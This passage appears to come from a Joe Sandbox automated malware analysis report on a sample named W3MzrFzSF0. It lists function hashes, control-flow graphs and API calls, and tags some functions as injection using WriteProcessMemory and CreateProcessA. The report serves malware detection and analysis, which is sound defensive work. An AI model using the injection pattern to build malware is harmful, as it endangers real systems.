76c5c9d-76c5cb9 1455->1459 1460 76c5c84-76c5c96 1455->1460 1457 76c5c70 1456->1457 1458 76c5c72-76c5c74 1456->1458 1457->1455 1458->1455 1463 76c5cbb-76c5cc1 1459->1463 1464 76c5cd1-76c5cd5 1459->1464 1460->1459 1465 76c5cc5-76c5cc7 1463->1465 1466 76c5cc3 1463->1466 1464->1383 1467 76c5cd7-76c5ce5 1464->1467 1465->1464 1466->1464 1469 76c5cf7-76c5cfb 1467->1469 1470 76c5ce7-76c5cf5 1467->1470 1472 76c5d01-76c5d19 1469->1472 1470->1469 1470->1472
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2071342526.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76c0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Hgq
                                                                                    • API String ID: 0-2103768809
                                                                                    • Opcode ID: d0f6f2a449a31be67be39cd2e3211cdfcf04f69a1ed8e0b00bd079022eb2faa4
                                                                                    • Instruction ID: 56268a60097156175f4699a24dc8229f5ca477ec13cacc85a9c493d8cf4d091b
                                                                                    • Opcode Fuzzy Hash: d0f6f2a449a31be67be39cd2e3211cdfcf04f69a1ed8e0b00bd079022eb2faa4
                                                                                    • Instruction Fuzzy Hash: 50E19BB17016118FDB29EB79C8607AE77F6AF89640F24456DD1478B391CF34E902CBA2
                                                                                    Function 0BE60040 Relevance: 1.7, Strings: 1, Instructions: 417COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2072445624.000000000BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BE60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_be60000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID: 0-3916222277
                                                                                    • Opcode ID: a5f4376489712bf9f2f84e3ce57d7658999d8bb3b7300228d492420b0779863f
                                                                                    • Instruction ID: 86d75a134aa6988b80bcb6b6cd59082d81fded3493ef77614a8f930fcb49d7a3
                                                                                    • Opcode Fuzzy Hash: a5f4376489712bf9f2f84e3ce57d7658999d8bb3b7300228d492420b0779863f
                                                                                    • Instruction Fuzzy Hash: EB026F35E00329DFEB14EB68C894BEDB7B6AF94200F508699D409B7291EF705E85CF51
                                                                                    Function 052C4880 Relevance: 1.4, Strings: 1, Instructions: 179COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070032798.00000000052C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_52c0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: {
                                                                                    • API String ID: 0-366298937
                                                                                    • Opcode ID: 339ae5e9907df4003640971a92ff92d2cf344b991a8d329f0b178e600354bd5b
                                                                                    • Instruction ID: 59a0c3c9d6c9155194671e925989e414c72715ade431b8a20dad1be275432cc6
                                                                                    • Opcode Fuzzy Hash: 339ae5e9907df4003640971a92ff92d2cf344b991a8d329f0b178e600354bd5b
                                                                                    • Instruction Fuzzy Hash: E4710474D10219CBDB14DFA9C4945EEBBF2BF88301F14C26AE419AB355D7709942CF94
                                                                                    Function 0BFA91B8 Relevance: .6, Instructions: 635COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2072603751.000000000BFA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BFA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_bfa0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 08fa64c3681d8167aa0f50bebdee9e2c71c3c46cae230ea92629f7fccbd5dd24
                                                                                    • Instruction ID: 63198b3c769bfae4a02742737e3e7831f04a21f9a73340db0d7c9157695204cd
                                                                                    • Opcode Fuzzy Hash: 08fa64c3681d8167aa0f50bebdee9e2c71c3c46cae230ea92629f7fccbd5dd24
                                                                                    • Instruction Fuzzy Hash: AD522C76910619CFCB25DF65C854AE9BBB1FF49300F14C6E9E409AB261EB71EA81CF40
                                                                                    Function 0BFACBE8 Relevance: .5, Instructions: 529COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2072603751.000000000BFA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BFA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_bfa0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 556eaf7f1f6055a08be59f9e945953962be0acded8576fba465c2b06efb2d978
                                                                                    • Instruction ID: 35aab3537dca3058791799c4969a281d6413816f1438f98dc1be84e680a394e5
                                                                                    • Opcode Fuzzy Hash: 556eaf7f1f6055a08be59f9e945953962be0acded8576fba465c2b06efb2d978
                                                                                    • Instruction Fuzzy Hash: 9D32187690061ACFCB25DF64C984BD9B7B2FF89300F1485E9E509AB261DB71EA85CF40
                                                                                    Function 0BFA13A0 Relevance: .4, Instructions: 396COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2072603751.000000000BFA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BFA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_bfa0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: DispatchMessage
                                                                                    • String ID:
                                                                                    • API String ID: 2061451462-0
                                                                                    • Opcode ID: cb7994e39f8e365026aee0bd0a9914574da28364ffe3fa0fb7bc49ccd582b464
                                                                                    • Instruction ID: 6e2463a03ce10007f4187c4607a9824c9330eda33b68db18e1047e4d692814bf
                                                                                    • Opcode Fuzzy Hash: cb7994e39f8e365026aee0bd0a9914574da28364ffe3fa0fb7bc49ccd582b464
                                                                                    • Instruction Fuzzy Hash: 94F15C72E00209CFDB18DFA9C944B9DBBF2FF89704F168558E405AB295DB74EA45CB80
                                                                                    Function 0BE64590 Relevance: .3, Instructions: 318COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2072445624.000000000BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BE60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_be60000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ba5dfd93edd7fb3ff452766308e6d927bbe3ca3b07aca963d7c4a53e0469757f
                                                                                    • Instruction ID: d5d2e65ac541bf03593c7c3762b211e646faf78fe35850cace4ba1d7afd5dbc4
                                                                                    • Opcode Fuzzy Hash: ba5dfd93edd7fb3ff452766308e6d927bbe3ca3b07aca963d7c4a53e0469757f
                                                                                    • Instruction Fuzzy Hash: 25D13E74E50209CFDB25DFB9C594A9DBBF2BF89344F248269E505AB391DB30A991CF00
                                                                                    Function 0139DFB4 Relevance: .3, Instructions: 264COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2067637310.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1390000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0f5b6d61299fcafcf9aee380f933147cf714133281e7c8bf520f2f36e11e453a
                                                                                    • Instruction ID: 7d2b6ca3ea2f1c0b0ba5425dd737af0f5ce76fef29f12932f800ac2712363d56
                                                                                    • Opcode Fuzzy Hash: 0f5b6d61299fcafcf9aee380f933147cf714133281e7c8bf520f2f36e11e453a
                                                                                    • Instruction Fuzzy Hash: 89A16F32E0021ACFCF05DFB9C8545AEBBB6FF84304B15456AE905EB265DB31E916CB80
                                                                                    Function 01394204 Relevance: .1, Instructions: 139COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2067637310.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1390000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: deaacfaccbb471840b164a50010a0029423a4c10745f10278c61f4ddbb1d3196
                                                                                    • Instruction ID: c76b260ec236d84d410719574ee377b31d07a3b9fd1c5ad920da432fbec9f8e9
                                                                                    • Opcode Fuzzy Hash: deaacfaccbb471840b164a50010a0029423a4c10745f10278c61f4ddbb1d3196
                                                                                    • Instruction Fuzzy Hash: 0451A6B4E012099FDB08DFA9C995AEEFBF2BF88300F148429D519AB364DB355942CF50
                                                                                    Function 01397043 Relevance: .1, Instructions: 135COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2067637310.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1390000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e95cdccd2ae80ce76ab653137f7e6fedb08f76e0a59d01d17c0322bf0bf40064
                                                                                    • Instruction ID: f49805f33d0efd4f17da277f1bf424b36faf5cb9d59573ebc3ce9e40b3f99c3a
                                                                                    • Opcode Fuzzy Hash: e95cdccd2ae80ce76ab653137f7e6fedb08f76e0a59d01d17c0322bf0bf40064
                                                                                    • Instruction Fuzzy Hash: D251A7B4E002099FDB08DFA9C955AEEFBF2BF88300F148429D509AB364DB355842CF50
                                                                                    Function 058B882E Relevance: 1.7, APIs: 1, Instructions: 245processCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1178 58b882e-58b88cd 1180 58b88cf-58b88d9 1178->1180 1181 58b8906-58b8926 1178->1181 1180->1181 1182 58b88db-58b88dd 1180->1182 1188 58b8928-58b8932 1181->1188 1189 58b895f-58b898e 1181->1189 1183 58b88df-58b88e9 1182->1183 1184 58b8900-58b8903 1182->1184 1186 58b88eb 1183->1186 1187 58b88ed-58b88fc 1183->1187 1184->1181 1186->1187 1187->1187 1190 58b88fe 1187->1190 1188->1189 1191 58b8934-58b8936 1188->1191 1195 58b8990-58b899a 1189->1195 1196 58b89c7-58b8a81 CreateProcessA 1189->1196 1190->1184 1193 58b8959-58b895c 1191->1193 1194 58b8938-58b8942 1191->1194 1193->1189 1197 58b8946-58b8955 1194->1197 1198 58b8944 1194->1198 1195->1196 1199 58b899c-58b899e 1195->1199 1209 58b8a8a-58b8b10 1196->1209 1210 58b8a83-58b8a89 1196->1210 1197->1197 1200 58b8957 1197->1200 1198->1197 1201 58b89c1-58b89c4 1199->1201 1202 58b89a0-58b89aa 1199->1202 1200->1193 1201->1196 1204 58b89ae-58b89bd 1202->1204 1205 58b89ac 1202->1205 1204->1204 1206 58b89bf 1204->1206 1205->1204 1206->1201 1220 58b8b12-58b8b16 1209->1220 1221 58b8b20-58b8b24 1209->1221 1210->1209 1220->1221 1222 58b8b18 1220->1222 1223 58b8b26-58b8b2a 1221->1223 1224 58b8b34-58b8b38 1221->1224 1222->1221 1223->1224 1225 58b8b2c 1223->1225 1226 58b8b3a-58b8b3e 1224->1226 1227 58b8b48-58b8b4c 1224->1227 1225->1224 1226->1227 1230 58b8b40 1226->1230 1228 58b8b5e-58b8b65 1227->1228 1229 58b8b4e-58b8b54 1227->1229 1231 58b8b7c 1228->1231 1232 58b8b67-58b8b76 1228->1232 1229->1228 1230->1227 1234 58b8b7d 1231->1234 1232->1231 1234->1234
                                                                                    APIs
                                                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 058B8A6E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070639285.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateProcess
                                                                                    • String ID:
                                                                                    • API String ID: 963392458-0
                                                                                    • Opcode ID: 0d1637a5e6c6530145b2d99f3cd50ceadcfd9047d8b16993071e93d1bdfc856b
                                                                                    • Instruction ID: 67316b0221f08a3073af9ab6169935f7318a15a68ca5ef0900a3b5ce8933739e
                                                                                    • Opcode Fuzzy Hash: 0d1637a5e6c6530145b2d99f3cd50ceadcfd9047d8b16993071e93d1bdfc856b
                                                                                    • Instruction Fuzzy Hash: A3916AB1D002198FEF24CF68C845BEDBBB6BF48314F1481A9D819E7240DBB49985CF92
                                                                                    Function 058B8838 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1235 58b8838-58b88cd 1237 58b88cf-58b88d9 1235->1237 1238 58b8906-58b8926 1235->1238 1237->1238 1239 58b88db-58b88dd 1237->1239 1245 58b8928-58b8932 1238->1245 1246 58b895f-58b898e 1238->1246 1240 58b88df-58b88e9 1239->1240 1241 58b8900-58b8903 1239->1241 1243 58b88eb 1240->1243 1244 58b88ed-58b88fc 1240->1244 1241->1238 1243->1244 1244->1244 1247 58b88fe 1244->1247 1245->1246 1248 58b8934-58b8936 1245->1248 1252 58b8990-58b899a 1246->1252 1253 58b89c7-58b8a81 CreateProcessA 1246->1253 1247->1241 1250 58b8959-58b895c 1248->1250 1251 58b8938-58b8942 1248->1251 1250->1246 1254 58b8946-58b8955 1251->1254 1255 58b8944 1251->1255 1252->1253 1256 58b899c-58b899e 1252->1256 1266 58b8a8a-58b8b10 1253->1266 1267 58b8a83-58b8a89 1253->1267 1254->1254 1257 58b8957 1254->1257 1255->1254 1258 58b89c1-58b89c4 1256->1258 1259 58b89a0-58b89aa 1256->1259 1257->1250 1258->1253 1261 58b89ae-58b89bd 1259->1261 1262 58b89ac 1259->1262 1261->1261 1263 58b89bf 1261->1263 1262->1261 1263->1258 1277 58b8b12-58b8b16 1266->1277 1278 58b8b20-58b8b24 1266->1278 1267->1266 1277->1278 1279 58b8b18 1277->1279 1280 58b8b26-58b8b2a 1278->1280 1281 58b8b34-58b8b38 1278->1281 1279->1278 1280->1281 1282 58b8b2c 1280->1282 1283 58b8b3a-58b8b3e 1281->1283 1284 58b8b48-58b8b4c 1281->1284 1282->1281 1283->1284 1287 58b8b40 1283->1287 1285 58b8b5e-58b8b65 1284->1285 1286 58b8b4e-58b8b54 1284->1286 1288 58b8b7c 1285->1288 1289 58b8b67-58b8b76 1285->1289 1286->1285 1287->1284 1291 58b8b7d 1288->1291 1289->1288 1291->1291
                                                                                    APIs
                                                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 058B8A6E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070639285.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateProcess
                                                                                    • String ID:
                                                                                    • API String ID: 963392458-0
                                                                                    • Opcode ID: 1a6dc0d937275f07fff651c054f7bf444841fcb51e39c4eecbc443250d8c2e50
                                                                                    • Instruction ID: 0eca94b20741eda38253e1184d637983b3f1d898114b226ecd1f41c45e5eb175
                                                                                    • Opcode Fuzzy Hash: 1a6dc0d937275f07fff651c054f7bf444841fcb51e39c4eecbc443250d8c2e50
                                                                                    • Instruction Fuzzy Hash: 9E916C71D002199FEF24CF68C845BEDBBBABF48314F0481A9D819E7240DBB49985CF92
                                                                                    Function 0139B1C8 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1292 139b1c8-139b1d7 1293 139b1d9-139b1e6 call 1399c38 1292->1293 1294 139b203-139b207 1292->1294 1299 139b1e8 1293->1299 1300 139b1fc 1293->1300 1295 139b209-139b213 1294->1295 1296 139b21b-139b25c 1294->1296 1295->1296 1303 139b269-139b277 1296->1303 1304 139b25e-139b266 1296->1304 1348 139b1ee call 139b460 1299->1348 1349 139b1ee call 139b450 1299->1349 1300->1294 1306 139b279-139b27e 1303->1306 1307 139b29b-139b29d 1303->1307 1304->1303 1305 139b1f4-139b1f6 1305->1300 1308 139b338-139b3f8 1305->1308 1310 139b289 1306->1310 1311 139b280-139b287 call 139ae80 1306->1311 1309 139b2a0-139b2a7 1307->1309 1343 139b3fa-139b3fd 1308->1343 1344 139b400-139b42b GetModuleHandleW 1308->1344 1314 139b2a9-139b2b1 1309->1314 1315 139b2b4-139b2bb 1309->1315 1313 139b28b-139b299 1310->1313 1311->1313 1313->1309 1314->1315 1317 139b2c8-139b2d1 call 139ae90 1315->1317 1318 139b2bd-139b2c5 1315->1318 1323 139b2de-139b2e3 1317->1323 1324 139b2d3-139b2db 1317->1324 1318->1317 1325 139b301-139b305 1323->1325 1326 139b2e5-139b2ec 1323->1326 1324->1323 1350 139b308 call 139b730 1325->1350 1351 139b308 call 139b760 1325->1351 1326->1325 1328 139b2ee-139b2fe call 139aea0 call 139aeb0 1326->1328 1328->1325 1331 139b30b-139b30e 1333 139b331-139b337 1331->1333 1334 139b310-139b32e 1331->1334 1334->1333 1343->1344 1345 139b42d-139b433 1344->1345 1346 139b434-139b448 1344->1346 1345->1346 1348->1305 1349->1305 1350->1331 1351->1331
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0139B41E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2067637310.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1390000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule
                                                                                    • String ID:
                                                                                    • API String ID: 4139908857-0
                                                                                    • Opcode ID: c677cb27d9782c793d71291a41d8b60e2cf0dd315ca252d8ee53b9253807ed0a
                                                                                    • Instruction ID: 05f3fb0e0de4d8cd9049c1114c5ce67ea42fb26f76d8d086a4ab31c7208e6bb2
                                                                                    • Opcode Fuzzy Hash: c677cb27d9782c793d71291a41d8b60e2cf0dd315ca252d8ee53b9253807ed0a
                                                                                    • Instruction Fuzzy Hash: ED713770A00B058FDB64DF6AD454B9ABBF1FF88308F108A2DD48AD7A44D775E945CB90
                                                                                    Function 013944E4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateActCtxA.KERNEL32(?), ref: 013959C9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2067637310.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1390000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: Create
                                                                                    • String ID:
                                                                                    • API String ID: 2289755597-0
                                                                                    • Opcode ID: c873306f7d4edb0e5d23cf86f2079e872913204a65e694f9beb13e2b14d774ff
                                                                                    • Instruction ID: 0cff6528f5014001740c516630ac5c60e0993892a0b34b887ad937555fd44aac
                                                                                    • Opcode Fuzzy Hash: c873306f7d4edb0e5d23cf86f2079e872913204a65e694f9beb13e2b14d774ff
                                                                                    • Instruction Fuzzy Hash: 9341DFB0C0071DCBDB25DFA9C884B8EBBB5BF49304F20806AD509AB255DB756989CF91
                                                                                    Function 01395913 Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateActCtxA.KERNEL32(?), ref: 013959C9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2067637310.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1390000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: Create
                                                                                    • String ID:
                                                                                    • API String ID: 2289755597-0
                                                                                    • Opcode ID: a72e956ebf9814cc02210e1999a0e228f218c8c20e3557fafe0c66c1a4249bd1
                                                                                    • Instruction ID: 533bb732d33da94aa51db962f64264fc5d4d9415468046ed4d1fe89309b634fc
                                                                                    • Opcode Fuzzy Hash: a72e956ebf9814cc02210e1999a0e228f218c8c20e3557fafe0c66c1a4249bd1
                                                                                    • Instruction Fuzzy Hash: 4641EFB0C00719CBDF25CFA9C984BCDBBB5BF49304F20805AD408AB255DB75698ACF91
                                                                                    Function 058BF5F8 Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • KiUserCallbackDispatcher.NTDLL(00000003,00000000,00000000,?,?,?,00000000), ref: 058BF676
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070639285.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallbackDispatcherUser
                                                                                    • String ID:
                                                                                    • API String ID: 2492992576-0
                                                                                    • Opcode ID: b59346791793a4fcdbc23ef08f60d49c6a763b1368dc5a4aaf8acdd97824ca6a
                                                                                    • Instruction ID: a3cf8cefefd1d5df2fc4a4564b12dc2904705fd881ccb3005e439696d0d022c1
                                                                                    • Opcode Fuzzy Hash: b59346791793a4fcdbc23ef08f60d49c6a763b1368dc5a4aaf8acdd97824ca6a
                                                                                    • Instruction Fuzzy Hash: B721B376B001159FEB14EB59DC01BAE7776FFC5314F048164EA0997364C770E855DB90
                                                                                    Function 0BE6CAA0 Relevance: 1.6, APIs: 1, Instructions: 73windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • PostMessageW.USER32(?,?,?,?), ref: 0BE6CB25
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2072445624.000000000BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BE60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_be60000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePost
                                                                                    • String ID:
                                                                                    • API String ID: 410705778-0
                                                                                    • Opcode ID: 59ed2af55ba09b257664b6dd0d2f1e7a24c84fffce8f8e95f424f56af89d188c
                                                                                    • Instruction ID: 19855315da8e51a5ed0ccf4459ee480b644f1c0d0e4a1035bd8ce8b1d94665e8
                                                                                    • Opcode Fuzzy Hash: 59ed2af55ba09b257664b6dd0d2f1e7a24c84fffce8f8e95f424f56af89d188c
                                                                                    • Instruction Fuzzy Hash: 2A21B1B18043858FDB12CFA5C845ADEBFB4EF49360F15849AD484EB252D3789944CB61
                                                                                    Function 052CE114 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,052CF6DD,?,?), ref: 052CF78F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070032798.00000000052C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_52c0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: DrawText
                                                                                    • String ID:
                                                                                    • API String ID: 2175133113-0
                                                                                    • Opcode ID: cdc5f7917efa5e595302dec5099c206bc6e05a7434a0d9fe271b7a2eec0b8e14
                                                                                    • Instruction ID: 265b910320a2ba909a2e2a334209d9a60f1555bc3ce587baf96a694b8c8ee509
                                                                                    • Opcode Fuzzy Hash: cdc5f7917efa5e595302dec5099c206bc6e05a7434a0d9fe271b7a2eec0b8e14
                                                                                    • Instruction Fuzzy Hash: 8C31D1B5D1020A9FDB10CF9AD984A9EBBF5FF48310F24846EE819A7211D775A944CFA0
                                                                                    Function 058B85A8 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 058B8640
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070639285.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: MemoryProcessWrite
                                                                                    • String ID:
                                                                                    • API String ID: 3559483778-0
                                                                                    • Opcode ID: 2bf16daa0c8fda73b20956a4baa81e2cea43b4fb0a1f552a54b93008934263ad
                                                                                    • Instruction ID: 756949cac0b9aeb45e87742d284ca5c86b419acfbd9e56bec7cc98e11d94e1f8
                                                                                    • Opcode Fuzzy Hash: 2bf16daa0c8fda73b20956a4baa81e2cea43b4fb0a1f552a54b93008934263ad
                                                                                    • Instruction Fuzzy Hash: BC2137B1D003499FDB10DFA9C885BDEBBF5FB88310F108429E919A7240C7749945CFA5
                                                                                    Function 052CF6F2 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,052CF6DD,?,?), ref: 052CF78F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070032798.00000000052C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_52c0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: DrawText
                                                                                    • String ID:
                                                                                    • API String ID: 2175133113-0
                                                                                    • Opcode ID: cedcdd5290e75432dff222e8575970edb5b105adc2a049b0d8b66ea33bca4231
                                                                                    • Instruction ID: bd7f6f71f948c1fba358cfe6d5698ebad5e64685176cc6ca95b26a587534b4ed
                                                                                    • Opcode Fuzzy Hash: cedcdd5290e75432dff222e8575970edb5b105adc2a049b0d8b66ea33bca4231
                                                                                    • Instruction Fuzzy Hash: 0E31B1B5D1030A9FDB10CF9AD984A9EBBF5BF48310F14842AE919A7210D375A544CFA1
                                                                                    Function 058B85B0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 058B8640
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070639285.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: MemoryProcessWrite
                                                                                    • String ID:
                                                                                    • API String ID: 3559483778-0
                                                                                    • Opcode ID: 35b557845c61116d651ddee80b2cdfcf2b503e5b316e2ec66078306ae5205f1d
                                                                                    • Instruction ID: 88ff2eb8fd429f506e27c3f7b26273a8ee2fcf66056c12c18b923c4d5ec6ceb6
                                                                                    • Opcode Fuzzy Hash: 35b557845c61116d651ddee80b2cdfcf2b503e5b316e2ec66078306ae5205f1d
                                                                                    • Instruction Fuzzy Hash: 5B2126B1D003499FDB10DFA9C885BDEBBF5FF88310F10842AE919A7240C7789954CBA5
                                                                                    Function 0BFA1960 Relevance: 1.6, APIs: 1, Instructions: 67windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,0BFA1582,00000000,00000000,03D14128,02D308B0), ref: 0BFA19D0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2072603751.000000000BFA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BFA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_bfa0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePeek
                                                                                    • String ID:
                                                                                    • API String ID: 2222842502-0
